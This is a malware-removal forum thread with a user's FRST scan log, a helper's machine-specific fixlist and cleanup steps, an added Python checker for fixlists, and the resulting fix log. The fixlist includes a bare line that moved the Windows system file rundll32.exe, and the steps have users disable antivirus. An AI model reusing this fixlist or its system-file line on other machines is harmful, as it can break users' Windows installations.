MSCONFIG\startupreg: iSkysoft Helper Compact.exe => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
MSCONFIG\startupreg: Jing => C:\Program Files (x86)\TechSmith\Jing\Jing.exe
MSCONFIG\startupreg: LifeCam => "C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe"
MSCONFIG\startupreg: LogMeIn Hamachi Ui => "D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
MSCONFIG\startupreg: OutfoxTV => C:\Program Files\OutfoxTV\OutfoxTV\DesktopContainer.exe
MSCONFIG\startupreg: Spotify => "C:\Users\Mitey Fresh\AppData\Roaming\Spotify\spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: VX1000 => C:\Windows\vVX1000.exe
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-2275511576-419542734-2349628481-500 - Administrator - Disabled)
Guest (S-1-5-21-2275511576-419542734-2349628481-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2275511576-419542734-2349628481-1014 - Limited - Enabled)
Mitey Fresh (S-1-5-21-2275511576-419542734-2349628481-1000 - Administrator - Enabled) => C:\Users\Mitey Fresh
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/15/2014 00:47:44 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/15/2014 00:47:44 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/15/2014 08:02:16 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/15/2014 08:02:16 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/14/2014 06:52:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/14/2014 06:52:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/14/2014 00:32:17 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/14/2014 00:32:17 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/13/2014 10:17:26 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/13/2014 10:17:26 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
 
System errors:
=============
Error: (10/15/2014 00:43:35 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/15/2014 07:58:03 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/14/2014 06:47:56 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/14/2014 00:41:00 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Definition Update for Microsoft Security Essentials - KB2310138 (Definition 1.185.3120.0).
 
Error: (10/14/2014 00:40:31 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.185.3011.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.6.0305.00
 
Source Path: 4.6.0305.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (10/13/2014 10:23:08 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.185.3011.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.6.0305.00
 
Source Path: 4.6.0305.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (10/13/2014 10:12:17 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/13/2014 10:54:36 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/12/2014 09:44:58 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/10/2014 07:34:16 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
 
Microsoft Office Sessions:
=========================
Error: (10/15/2014 00:47:44 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/15/2014 00:47:44 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/15/2014 08:02:16 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/15/2014 08:02:16 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/14/2014 06:52:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/14/2014 06:52:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/14/2014 00:32:17 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/14/2014 00:32:17 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/13/2014 10:17:26 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/13/2014 10:17:26 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
 
==================== Memory info =========================== 
 
Processor: Intel® Pentium® CPU P6100 @ 2.00GHz
Percentage of memory in use: 51%
Total physical RAM: 3886.04 MB
Available physical RAM: 1903.57 MB
Total Pagefile: 7770.26 MB
Available Pagefile: 5746.81 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.39 GB) (Free:111.4 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (Data) (Fixed) (Total:180.27 GB) (Free:117.47 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: DA22E49B)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

#5
Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Hi again, :)

Sorry we missed you the first time around. We were really slammed early in the month and it took a while to dig out. However, we found you and now let's get you taken care of. :thumbsup:

The source of many of your problems is your use of peer-to-peer software (BitComet). BitComet lets in a myriad of infections. That said, I will post the warning below.

Next, your browsers are a mess. I wish I could say it more gently, but... So, I am going to try and remove the issues with IE and FF (Chrome seems to be ok), but it may make more sense to just reset the browsers to their factory settings. Let's try the fix first. If that doesn't work, then we'll do the reset. The fix is in the FRST fix and you don't need to do anything other than follow the instructions below. If IE and FF are not working after the FRST fix and you're unable to proceed with the other tools, then perform the reset. If that fails to correct the issue and you can't run the other tools, let me know (likely you'll have to use Chrome) and I'll work up Plan "B".

Please do these steps in this order and then post the results in the same order :)

P2P warning!

  • P2P programs, while legal in themselves, are often used to obtain some illegal downloads. Currently it's one of the best ways to get infected. There have been some extreme cases in which passwords, private or financial data were exposed to a file-sharing network because of bad P2P configuration.

I strongly recommend full uninstallation of any P2P apps. To do so:
  • Press the Windows key + R on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for the previously mentioned program(s), right-click the entry and click Uninstall.

This is optional, but please consider this. If you leave it installed, please refrain from using it while we're cleaning your machine.

Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.

  • Press the Windows key + R on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire content of the codebox below and paste into the Notepad document:
    start
    
    AppInit_DLLs: C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL => C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL File Not Found
    
    AppInit_DLLs-x32: c:\progra~3\fastan~1\fastan~1.dll => "c:\progra~3\fastan~1\fastan~1.dll" File Not Found
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ninemsn.com.au/?ocid=iehp
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x6E8195E10142CE01
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
    
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
    
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
    
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
    
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
    
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
    
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
    
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
    
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
    
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe http://www.sweet-pag...F1A80P6304P6304
    
    SearchScopes: HKLM - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
    
    SearchScopes: HKLM - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
    
    SearchScopes: HKLM-x32 - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
    
    SearchScopes: HKLM-x32 - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
    
    BHO: No Name -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.x64.dll No File
    
    BHO: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.x64.dll No File
    
    BHO-x32: UTubErAdBllockEr -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.dll No File
    
    BHO-x32: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.dll No File
    
    BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
    
    Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
    
    Handler-x32: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
    
    Filter: text/xml - {807553E5-5146-11D5-A672-00B0D022E945} -  No File
    
    FF ProfilePath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
    
    FF NewTab: hxxp://www.sweet-page.com/newtab/?type=nt&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
    
    FF DefaultSearchEngine: sweet-page
    
    FF SelectedSearchEngine: sweet-page
    
    FF Homepage: hxxp://www.sweet-page.com/?type=hp&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
    
    FF Plugin: @microsoft.com/GENUINE -> disabled No File
    
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
    
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml
    
    FF Extension: No Name - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com [Not Found]
    
    FF StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe http://www.sweet-pag...F1A80P6304P6304
    
    S2 671c50b0; "C:\Windows\system32\rundll32.exe" "c:\progra~3\browse~1\BrowserSystemEnahncerSvc.dll",service
    
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    
    C:\Windows\system32\rundll32.exe
    
    C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys
    
    Task: {07BB6D31-E1B4-4CAC-A67B-922398F9EEB3} - \UpdaterEX No Task File <==== ATTENTION
    
    Task: {B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6} - \PC Performer No Task File <==== ATTENTION
    
    EmptyTemp:
    
    end
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt, have to be in the same location or the fix will not work!
  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please post it to your reply.

 

 

Fix with Junkware Removal Tool
 
Please download JRT by Thisisu and save the file to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
 
  • Right-click on the JRT icon and select Run as Administrator to start the tool.
  • Follow the prompts and let this process run uninterrupted.
  • This scan can take a while, depending on your System specs.
  • Upon completion, a log (JRT.txt) will open on your desktop.
 
Please include the contents of that file in your reply.
 
Do not forget to re-enable your previously switched off protection software!
Please also manually reboot your machine after this procedure.
 
Scan with AdwCleaner
 
Please download AdwCleaner by Xplode and save the file to your desktop.
 
  • Right-click on the AdwCleaner icon and select Run as Administrator to start the tool.
  • Follow the prompts and click Scan.
  • Upon completion, click Report. A log (AdwCleaner[R*].txt) will open.
 
Please include the contents of that file in your reply.

 

Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one).
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.



  • Right-click on the ZOEK icon and select Run as Administrator to start the tool.
  • Wait patiently until the main console appears; it may take a minute or two.
  • In the main box please paste in the following script:
    createsrpoint;
    
    process;
    
    services-list;
    
    systemspecs;
    
    startupall;
    
    skipfix-iedefaults;
    
    firefoxlook;
    
    chromelook;
    
    filesrcm;
    
    installedprogs;
  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Post its content into your next reply.

 

 

If you need to Reset IE and FF.

 

These instructions might not be exactly correct for your versions of IE and FF, but it should get you close enough so that you can figure out the rest.

How to Reset Firefox, click here.

How to Reset Internet Explorer, click here.

 


  • 0
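An added pre-flight check for a fixlist like the one above (example code, not part of the original post and not FRST's own): it classifies each line by the prefixes seen in this thread and flags bare file paths under the Windows directory, which a fix script acts on as files, and service lines where a Windows binary is only the host for a third-party DLL. The category names, the `C:\Windows` root and the function names are assumptions of this example; the sample lines are copied from this thread's fixlist.

```python
import re

# Assumption for this example: Windows is installed at C:\Windows.
PROTECTED_ROOTS = ("c:\\windows\\",)

BARE_PATH = re.compile(r'^"?[A-Za-z]:\\')                      # line is only a path
SERVICE = re.compile(r'^[RSU]\d\s+(?P<name>[^;]+);\s*(?P<image>.+)$')
REGISTRY = re.compile(r'^(HKLM|HKCU|HKU|HKCR)\\', re.I)
DIRECTIVE = re.compile(r'^\w+:$')                              # e.g. EmptyTemp:
LOG_ENTRY = re.compile(r'^[A-Za-z][\w -]*:\s')                 # e.g. "BHO-x32: ..."
EXECUTABLE = re.compile(r'[A-Za-z]:\\[^"]*?\.(?:exe|dll|sys)', re.I)

# Sample lines taken from the fixlist posted in this thread.
SAMPLE_FIXLIST = r'''start
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ninemsn.com.au/?ocid=iehp
BHO: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.x64.dll No File
S2 671c50b0; "C:\Windows\system32\rundll32.exe" "c:\progra~3\browse~1\BrowserSystemEnahncerSvc.dll",service
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
C:\Windows\system32\rundll32.exe
C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys
Task: {07BB6D31-E1B4-4CAC-A67B-922398F9EEB3} - \UpdaterEX No Task File <==== ATTENTION
EmptyTemp:
end
'''


def classify(line):
    """Return a coarse category for one fixlist line."""
    s = line.strip()
    if not s:
        return "blank"
    if s.lower() in ("start", "end"):
        return "marker"
    if BARE_PATH.match(s):          # checked first: "C:" would otherwise look like a prefix
        return "file_path"
    if SERVICE.match(s):
        return "service"
    if REGISTRY.match(s):
        return "registry"
    if DIRECTIVE.match(s):
        return "directive"
    if LOG_ENTRY.match(s):
        return "log_entry"
    return "unknown"


def is_protected(path):
    """True when the path sits under a protected root (case-insensitive)."""
    return path.lower().startswith(PROTECTED_ROOTS)


def review_fixlist(text):
    """Return (line number, severity, note) for lines that deserve a second look."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        s = raw.strip()
        kind = classify(s)
        if kind == "file_path":
            path = s.strip('"')
            if is_protected(path):
                findings.append(
                    (lineno, "HIGH", f"bare path under the Windows directory: {path}"))
        elif kind == "service":
            paths = EXECUTABLE.findall(SERVICE.match(s)["image"])
            # A Windows binary followed by a second module is a host process;
            # the component that belongs to the unwanted software is the argument.
            if len(paths) > 1 and is_protected(paths[0]):
                findings.append(
                    (lineno, "INFO",
                     f"{paths[0]} only hosts this service; the component is {paths[1]}"))
        elif kind == "unknown":
            findings.append((lineno, "WARN", f"unrecognised line: {s}"))
    return findings


if __name__ == "__main__":
    for lineno, severity, note in review_fixlist(SAMPLE_FIXLIST):
        print(f"line {lineno}: [{severity}] {note}")
```
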

#6
awesomesauce


Hi,

 

Thank you for your detailed response. It is very much appreciated.

 

I had a feeling it was messy in FF and IE. Part of the reason I exclusively use Chrome these days (plus I just prefer it as a browser).

 

However the original problem I described is in Chrome. I still closely followed your instructions because I think it's good to get everything cleaned, but I hope it will also fix the Chrome issue.

 

Here are the outcomes/logs:

 

- I have completely uninstalled BitComet.

 

- FRST Fix Log:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 15-10-2014 02
Ran by Mitey Fresh at 2014-10-16 12:32:53 Run:1
Running from C:\Users\Mitey Fresh\Desktop
Loaded Profile: Mitey Fresh (Available profiles: Mitey Fresh)
Boot Mode: Normal
==============================================
 
 
"C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL" => Value Data removed successfully.
"c:\progra~3\fastan~1\fastan~1.dll" => Value Data removed successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache => value deleted successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache_TIMESTAMP => value deleted successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => Value was restored successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => Key deleted successfully.
"HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{25880CCB-24B8-785F-89B4-3DDCE851F8CF}" => Key deleted successfully.
"HKCR\CLSID\{25880CCB-24B8-785F-89B4-3DDCE851F8CF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{65716D5D-F3D7-C35B-7F16-25F69BF58395}" => Key deleted successfully.
"HKCR\CLSID\{65716D5D-F3D7-C35B-7F16-25F69BF58395}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{25880CCB-24B8-785F-89B4-3DDCE851F8CF}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{25880CCB-24B8-785F-89B4-3DDCE851F8CF}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{65716D5D-F3D7-C35B-7F16-25F69BF58395}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{65716D5D-F3D7-C35B-7F16-25F69BF58395}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
"HKCR\PROTOCOLS\Handler\WSISVCUchrome" => Key deleted successfully.
"HKCR\Wow6432Node\PROTOCOLS\Handler\WSISVCUchrome" => Key not found.
"HKCR\PROTOCOLS\Filter\text/xml" => Key deleted successfully.
"HKCR\CLSID\{807553E5-5146-11D5-A672-00B0D022E945}" => Key not found.
 => Should not be moved.
Firefox newtab deleted successfully.
Firefox DefaultSearchEngine deleted successfully.
Firefox SelectedSearchEngine deleted successfully.
Firefox homepage deleted successfully.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml => Moved successfully.
C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com not found.
HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\\Default => Value was restored successfully.
671c50b0 => Service deleted successfully.
FairplayKD => Service deleted successfully.
C:\Windows\system32\rundll32.exe => Moved successfully.
"C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{07BB6D31-E1B4-4CAC-A67B-922398F9EEB3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07BB6D31-E1B4-4CAC-A67B-922398F9EEB3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UpdaterEX" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PC Performer" => Key deleted successfully.
EmptyTemp: => Removed 4.5 GB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====
 
- JRT File:
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.14.2014:1)
OS: Windows 7 Home Premium x64
Ran by Mitey Fresh on Thu 16/10/2014 at 13:40:49.36
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\sizlsearch_RASAPI32
